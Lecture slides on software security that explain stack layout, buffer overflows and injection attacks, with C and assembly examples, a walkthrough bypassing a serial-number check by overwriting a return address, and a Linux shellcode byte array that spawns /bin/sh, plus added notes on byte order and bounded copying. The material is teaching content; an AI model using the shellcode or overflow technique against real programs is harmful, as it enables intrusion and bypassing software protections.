(1)

Lect-17 Software Security

Academic year: 2020

(2)
Background

Many vulnerabilities of applications come not from their specifications and protocols but from their implementations:

Weak implementation of passwords

Buffer overflow (can be used to redirect the control flow of a program)

Race conditions

(3)

Definition

(4)

Most common attacks on software:

Buffer overflow

stack overflow

command injection

(5)

Buffer Overflow

Buffer and stack overflow attacks overwrite the contents of the heap or stack respectively by writing extra bytes.

(6)

Stack Overflow

(7)

Command Injection

(8)

SQL Injection

SQL injections use malicious SQL code to retrieve or modify important information from database servers. SQL injections can be used to bypass login credentials. Sometimes SQL injections fetch important information from a database or delete all important data from a database.

(9)

Background: Buffer overflow

Typical Attack Scenario:

Users enter data into a Web form

Web form is sent to server

Server writes data to buffer, without checking length of input data

Data overflows from buffer

Sometimes, overflow can enable an attack

Web form attack could be carried out by anyone with an Internet

(10)

Background: layout of the virtual space of a process

The layout of the virtual space of a

(11)

Cont.

Code and data consist of instructions and of initialized and uninitialized global and static data, respectively;

The runtime heap is used for dynamically allocated memory (malloc());

(12)

Layout Of Stack

The stack grows from the high-end address to the low-end address (a buffer grows from the low-end address to the high-end address);

Return address: when a function returns, the instructions it points to will be executed;

Stack frame pointer (esp): is used to reference local

(13)

Example

#include <stdio.h>

int cal(int a, int b) {
    int c;
    c = a + b;
    return c;
}

int main() {
    int d;
    d = cal(1, 2);
    printf("%d\n", d);
    return 0;
}

Stack during cal(), from the high-end address down to the low-end address: b (2), a (1), ret addr (0x08048229), previous ebp, c; esp points at the low end.

(14)

Dump of assembler code for function main:

0x08048204 <main+0>:  lea 0x4(%esp),%ecx
0x08048208 <main+4>:  and $0xfffffff0,%esp
0x0804820b <main+7>:  pushl -0x4(%ecx)
0x0804820e <main+10>: push %ebp
0x0804820f <main+11>: mov %esp,%ebp
0x08048211 <main+13>: push %ecx
0x08048212 <main+14>: sub $0x24,%esp
0x08048215 <main+17>: movl $0x2,0x4(%esp)      ; pass parameter
0x0804821d <main+25>: movl $0x1,(%esp)         ; pass parameter
0x08048224 <main+32>: call 0x80481f0 <cal>
0x08048229 <main+37>: mov %eax,-0x8(%ebp)
0x0804822c <main+40>: mov -0x8(%ebp),%eax
0x0804822f <main+43>: mov %eax,0x4(%esp)
0x08048233 <main+47>: movl $0x80a0c88,(%esp)
0x0804823a <main+54>: call 0x8048c40 <printf>
0x0804823f <main+59>: add $0x24,%esp
0x08048242 <main+62>: pop %ecx
0x08048243 <main+63>: pop %ebp
0x08048244 <main+64>: lea -0x4(%ecx),%esp
0x08048247 <main+67>: ret

(15)

Dump of assembler code for function cal:

0x080481f0 <cal+0>:  push %ebp
0x080481f1 <cal+1>:  mov %esp,%ebp
0x080481f3 <cal+3>:  sub $0x10,%esp           ; reserve 16 bytes for local variables in stack
0x080481f6 <cal+6>:  mov 0xc(%ebp),%eax
0x080481f9 <cal+9>:  add 0x8(%ebp),%eax
0x080481fc <cal+12>: mov %eax,-0x4(%ebp)
0x080481ff <cal+15>: mov -0x4(%ebp),%eax
0x08048202 <cal+18>: leave

(16)

Layout of Heap

Global variables

Static variables

(17)

Stack Buffer Overflow

A buffer overflow occurs when too much data is put into the buffer;

The C language and its derivatives (C++) offer many ways to put

(18)

Example

#include <stdio.h>
#include <string.h>

int bof() {
    char buffer[8];                          // an 8-byte buffer which is in the stack
    strcpy(buffer, "AAAAAAAAAAAAAAAAAAA");   // copy 20 bytes into buffer
    // this will cause the content of "ret" to be overwritten;
    // namely, the return address will be 0x41414141 (AAAA)
    return 1;
}

int main() {
    bof();                 // call bof
    printf("end\n");       // will never be executed;
    return 1;
}

Stack after the strcpy, from the low-end address (ESP) upward: buffer (AAAA AAAA), previous EBP (AAAA), RET -> printf() (AAAA), and four more bytes (AAAA) beyond it.

(19)

Basic Idea of the Attack using stack buffer overflow

[Figure: stack diagram. The stack grows from the high address toward the low address, the string grows the other way. From the top of the stack: attack code, local variable (buffer), RET.]

Inject malicious code into the virtual space of a process;

(20)

Example

Program asks for a serial number that attacker does not know

Attacker also does not have source code

Attacker does have the executable (exe)

(21)

Cont.

• Note that 0x41 is "A"

• Looks like ret overwritten by 2 bytes!

• I think the stack is overwritten by 3 bytes.

(22)

Cont.

(23)

Cont.

Find that 401034 is “@^P4” in ASCII ('\0' is 00)

• Byte order is reversed? Why?

(24)

Cont.

Reverse the byte order to “4^P@” (\x34\x10\x40\x00) and…

• Success! We've bypassed the serial number check by exploiting a buffer overflow
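Added example, not from the slides, answering the "byte order is reversed" question above: x86 is little-endian, so a 4-byte value such as 0x00401034 is stored with its least significant byte at the lowest address, and a memory or crash dump therefore shows it as \x34\x10\x40\x00 ("4^P@\0") rather than in the written order. The same rule is what you apply when reading saved return addresses in a core dump or a debugger's stack view. The helper names below are mine; the value 0x00401034 is the address from the slides.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Little-endian byte order of a 32-bit value, computed with shifts so the
 * result does not depend on the machine running this code. */
void u32_to_le_bytes(uint32_t v, uint8_t out[4])
{
    out[0] = (uint8_t)(v & 0xffu);
    out[1] = (uint8_t)((v >> 8) & 0xffu);
    out[2] = (uint8_t)((v >> 16) & 0xffu);
    out[3] = (uint8_t)((v >> 24) & 0xffu);
}

/* Byte at position i (0 = lowest address) of v as it sits in memory on a
 * little-endian machine; this is what a hex dump of the stack shows. */
uint8_t le_byte(uint32_t v, int i)
{
    uint8_t b[4];
    u32_to_le_bytes(v, b);
    return b[i & 3];
}

/* Byte order the host CPU really uses: copy the value into a byte array and
 * compare it with the little-endian form. 1 on x86 and other little-endian
 * hosts, 0 on a big-endian host. */
int host_is_little_endian(void)
{
    uint32_t v = 0x00401034u;
    uint8_t in_memory[4], le[4];
    memcpy(in_memory, &v, sizeof v);
    u32_to_le_bytes(v, le);
    return memcmp(in_memory, le, sizeof le) == 0;
}

/* Printable rendering of one byte, the way the slides read "@^P4":
 * control characters in caret notation, NUL as \0. */
static void print_byte_as_char(uint8_t b)
{
    if (b == 0)            printf("\\0");
    else if (b < 0x20)     printf("^%c", b + 0x40);   /* 0x10 -> ^P */
    else if (b < 0x7f)     printf("%c", b);
    else                   printf("\\x%02x", b);
}

int main(void)
{
    uint32_t addr = 0x00401034u;   /* the address value from the slides */
    uint8_t b[4];
    int i;

    u32_to_le_bytes(addr, b);
    printf("value 0x%08x, read most significant byte first: ", addr);
    for (i = 3; i >= 0; i--) print_byte_as_char(b[i]);
    printf("\nsame value as stored in memory (little-endian):  ");
    for (i = 0; i < 4; i++) print_byte_as_char(b[i]);
    printf("\nmemory bytes:");
    for (i = 0; i < 4; i++) printf(" \\x%02x", b[i]);
    printf("\nthis host is %s-endian\n", host_is_little_endian() ? "little" : "big");
    return 0;
}
```

The shift-based conversion is kept separate from the memcpy-based probe on purpose: the first is the portable way to serialize a value for a wire format or a file, the second tells you what a raw dump of this machine's memory will look like.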

(25)

Example-Create a shell

#include <unistd.h>
#include <stdlib.h>

char shellcode[] =
    "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46"
    "\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1"
    "\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

int main() {
    char *name[2];
    name[0] = "/bin/sh";
    name[1] = 0x0;
    execve(name[0], name, 0x0);
    exit(0);
}

Shellcode can be looked at as a sequence of binary instructions; the purpose of this shellcode is to create a command shell in Linux.

(26)

Cont.

#include <stdio.h>

/* shellcode[] is the byte array defined on the previous slide */
void sh() {
    int *ret;                       // named "return" on the slide; that is a C keyword, so renamed
    ret = (int *)&ret + 2;          // let ret point to the unit containing the return address
    (*ret) = (int)shellcode;        // let the return address point to the shellcode (shell code to create a shell)
}

int main() {
    sh();
    printf("main end :)\n");
    return 0;
}

(27)

Cont.

(gdb) disas sh

Dump of assembler code for function sh:

0x08048208 <sh+0>:  push %ebp
0x08048209 <sh+1>:  mov %esp,%ebp
0x0804820b <sh+3>:  sub $0x10,%esp
0x0804820e <sh+6>:  lea -0x4(%ebp),%eax
0x08048211 <sh+9>:  add $0x8,%eax              ; skip previous ebp, reach the return address
0x08048214 <sh+12>: mov %eax,-0x4(%ebp)
0x08048217 <sh+15>: mov -0x4(%ebp),%edx
0x0804821a <sh+18>: mov $0x80bd6a0,%eax
0x0804821f <sh+23>: mov %eax,(%edx)
0x08048221 <sh+25>: leave
0x08048222 <sh+26>: ret

(28)

Three issues for injecting codes

How to find a location in the stack to inject malicious code?

How to generate a shellcode (Attack Code)?

How to redirect the execution flow to the shellcode?

If using stack buffer overflow, the content of the memory unit storing the return address should be modified.

The injected payload should be long enough to do

(29)

How to find a location to inject code

If using stack buffer overflow, we might need to locate the stack of a function.

Then we need to determine the offset from the bottom or the top of the stack to inject the shell code.

We can use the following code to locate a stack:


(30)

Cont.

unsigned long find_start(void) {
    __asm__("movl %esp, %eax");
}

unsigned long find_end(void) {
    __asm__("movl %ebp, %eax");
}

int main() {

(31)

How to Avoid Software Attacks

The only way to avoid such attacks is to practice good programming techniques.

System-level security can be provided using better firewalls.

Using intrusion detection and prevention can
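As an added example (not part of the slides), here is what "practice good programming techniques" means for the two cases the deck shows: the bof() function that strcpy()s 20 bytes into an 8-byte stack buffer, and the typical attack scenario where a server writes a web-form field into a buffer without checking the length of the input. The bounded copy below rejects input that does not fit instead of writing past the end of the buffer, so the saved EBP and the return address above it are never touched. The names copy_bounded, handle_form_field and sentinel_intact_after_copy, and the sample inputs, are constructed for this illustration.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/*
 * Bounded replacement for the unchecked strcpy() in the bof() example.
 * Copies src into dst only when the whole string plus its NUL terminator
 * fits; otherwise dst becomes an empty string and the call reports failure.
 * Nothing is ever written beyond dst[dstsize - 1].
 */
int copy_bounded(char *dst, size_t dstsize, const char *src)
{
    size_t n = 0;
    if (dst == NULL || dstsize == 0 || src == NULL)
        return -1;
    /* measure src, but never look further than the buffer could hold */
    while (n < dstsize && src[n] != '\0')
        n++;
    if (n == dstsize) {          /* no room left for the terminator: reject */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, n + 1);     /* n characters plus the NUL, all inside dst */
    return 0;
}

/*
 * Server-side handler for the "typical attack scenario": store a web-form
 * field in an 8-byte stack buffer, like buffer[8] in bof(), but refuse input
 * that does not fit instead of overflowing. Returns 1 = stored, 0 = rejected.
 */
int handle_form_field(const char *field)
{
    char buffer[8];
    if (copy_bounded(buffer, sizeof buffer, field) != 0)
        return 0;
    return 1;
}

/*
 * Check helper: a sentinel byte sits directly after an 8-byte buffer; returns
 * 1 if it survived the copy, 0 if it was overwritten. With the unchecked
 * strcpy() of the slides the 19-character string would clobber it.
 */
int sentinel_intact_after_copy(const char *src)
{
    struct { char buf[8]; unsigned char guard; } frame;
    frame.guard = 0xC3;
    (void)copy_bounded(frame.buf, sizeof frame.buf, src);
    return frame.guard == 0xC3;
}

int main(void)
{
    /* constructed sample inputs, including the 19-'A' string from the bof() slide */
    const char *inputs[] = {
        "ABC",
        "AAAAAAA",                 /* 7 characters: fits together with the NUL */
        "AAAAAAAA",                /* 8 characters: no room left for the NUL */
        "AAAAAAAAAAAAAAAAAAA"      /* 19 characters: the bof() payload */
    };
    size_t i;
    for (i = 0; i < sizeof inputs / sizeof inputs[0]; i++)
        printf("%-20s -> %s\n", inputs[i],
               handle_form_field(inputs[i]) ? "stored" : "rejected: too long");
    return 0;
}
```

Rejecting rather than silently truncating is deliberate: a truncated serial number or password still looks like valid data to the rest of the program, whereas an explicit error is something the caller can log and that an intrusion detection system can count.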

References
